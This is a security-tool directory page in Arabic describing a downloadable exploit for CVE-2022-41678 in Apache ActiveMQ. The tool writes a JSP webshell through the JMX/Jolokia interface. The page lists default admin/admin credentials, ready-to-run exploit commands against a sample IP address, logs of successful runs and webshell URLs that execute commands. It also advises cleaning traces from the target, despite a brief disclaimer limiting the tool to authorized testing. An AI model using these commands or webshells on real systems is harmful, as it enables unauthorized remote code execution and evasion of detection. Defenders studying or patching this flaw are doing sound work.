Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-41678 — CVE-2022-41678 هو ثغرة تنفيذ برمجيات عن بُعد في Apache ActiveMQ. تسمح هذه الثغرة للمهاجم بتعديل إعدادات Log4j أو إعدادات JFR (Java Flight Recorder) عبر واجهة JMX (Java Management Extensions)، وبالتالي كتابة webshell من نوع JSP خبيثة إلى دليل الويب الخاص بالخادم، مما يحقق في النهاية تنفيذ برمجيات عن بُعد. | Kitploit
أدوات/GitHubGitHub/urjack2025/cve-2022-41678
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHuburjack2025/cve-2022-41678

CVE-2022-41678

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
22منذ 11 أشهرلم تتم المراجعة بعد

حول

CVE-2022-41678 هو ثغرة تنفيذ برمجيات عن بُعد في Apache ActiveMQ. تسمح هذه الثغرة للمهاجم بتعديل إعدادات Log4j أو إعدادات JFR (Java Flight Recorder) عبر واجهة JMX (Java Management Extensions)، وبالتالي كتابة webshell من نوع JSP خبيثة إلى دليل الويب الخاص بالخادم، مما يحقق في النهاية تنفيذ برمجيات عن بُعد.

مشاركة

أداة استغلال ثغرة Apache ActiveMQ CVE-2022-41678

نبذة عن الثغرة

المرجع: https://app.nextcyber.cn/courses/41/tasks/580

CVE-2022-41678 هي ثغرة تنفيذ تعليمات برمجية عن بُعد في Apache ActiveMQ. تسمح هذه الثغرة للمهاجم بتعديل إعدادات Log4j أو إعدادات JFR (Java Flight Recorder) عبر واجهة JMX (Java Management Extensions)، وبالتالي كتابة webshell ضار بصيغة JSP إلى دليل الويب الخاص بالخادم، مما يؤدي في النهاية إلى تنفيذ تعليمات برمجية عن بُعد.

تؤثر هذه الثغرة على عدة إصدارات من Apache ActiveMQ، وتعتمد الإصدارات المتأثرة تحديدًا على استخدام إعدادات Log4j وJFR.

المتطلبات البيئية

  • Python 3.6 أو أحدث
  • تثبيت التبعيات المطلوبة:
    root@kitploit:~
    pip install requests
    
  • يجب أن يكون خادم ActiveMQ المستهدف قد فعّل واجهة JMX (عادةً عبر المسار /api/jolokia/)
  • يحتاج المهاجم إلى معرفة اسم المستخدم وكلمة المرور لوحدة تحكم ActiveMQ (الافتراضي عادةً admin/admin)

طريقة الاستخدام

الاستخدام الأساسي

استخدام بيانات الاعتماد الافتراضية admin/admin وطريقة الاستغلال المكتشفة تلقائيًا:

root@kitploit:~
python exp.py http://target:8161

كما يمكن تحديد اسم المستخدم وكلمة المرور عبر المعاملين -u و-p:

root@kitploit:~
# 使用 Log4j
python exp.py -u admin -p admin http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin http://10.22.174.214:8161
2025-10-14 22:53:54,115 - INFO - choice MBean 'org.apache.logging.log4j2:type=5faeada1' automatically
2025-10-14 22:53:54,334 - INFO - update log config
2025-10-14 22:53:54,467 - INFO - write webshell to http://10.22.174.214:8161/admin/shell.jsp?cmd=id
2025-10-14 22:53:54,655 - INFO - restore log config

بالإضافة إلى طريقة استغلال Log4j المستخدمة افتراضيًا، يمكن تحديد طريقة استغلال JFR عبر المعامل --exploit jfr.

root@kitploit:~
# 使用 JFR 方式
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161/
2025-10-14 23:16:35,978 - INFO - choice MBean jdk.management.jfr:type=FlightRecorder manually
2025-10-14 23:16:37,390 - INFO - create flight record, id = 1
2025-10-14 23:16:37,533 - INFO - update configuration for record 1
2025-10-14 23:16:38,167 - INFO - start record
2025-10-14 23:16:39,243 - INFO - stop record
2025-10-14 23:16:39,309 - INFO - write webshell to http://10.22.174.214:8161/admin/shelljfr.jsp?cmd=id

التحقق من نتيجة الاستغلال

بعد نجاح الاستغلال، يمكن تنفيذ الأوامر عبر زيارة عنوان URL التالي:

root@kitploit:~
# Log4j 方式写入的 webshell
http://target:8161/admin/shell.jsp?cmd=命令

# JFR 方式写入的 webshell
http://target:8161/admin/shelljfr.jsp?cmd=命令

على سبيل المثال، لتنفيذ أمر id:

root@kitploit:~
http://target:8161/admin/shell.jsp?cmd=id

توضيح معاملات الأداة

المعاملالاختصارالنوعالقيمة الافتراضيةالوصف
--username-uسلسلة نصيةadminاسم المستخدم لوحدة تحكم ActiveMQ
--password-pسلسلة نصيةadminكلمة مرور وحدة تحكم ActiveMQ
--exploit-eسلسلة نصيةautoطريقة الاستغلال، القيم الممكنة: auto, log4j, jfr
url-سلسلة نصية-عنوان URL الخاص بخادم ActiveMQ المستهدف (معامل إلزامي)

ملاحظات

  1. هذه الأداة مخصصة للبحث الأمني والاختبار المصرح به فقط، ولا تستخدمها على أنظمة غير مصرح بها.
  2. بعد نجاح الاستغلال، تحاول الأداة استعادة إعدادات Log4j الأصلية لتقليل التأثير على النظام المستهدف قدر الإمكان.
  3. إذا كان النظام المستهدف لديه قيود على الوصول إلى الشبكة، فقد تحتاج إلى تعديل إعدادات الشبكة لضمان الوصول إلى واجهة JMX الخاصة بالهدف.
  4. قد تختلف المسارات والإعدادات باختلاف إصدارات ActiveMQ، وقد تحتاج إلى تعديل المسارات في الأداة حسب الحالة الفعلية.
  5. تستخدم الأداة واجهة JMX للتنفيذ، وتأكد من أن ActiveMQ المستهدف قد فعّل هذه الواجهة.
  6. قد يؤدي تنفيذ هذه الأداة إلى ترك سجلات على النظام المستهدف، لذا انتبه إلى تنظيف الآثار ذات الصلة.
تنزيل الأداة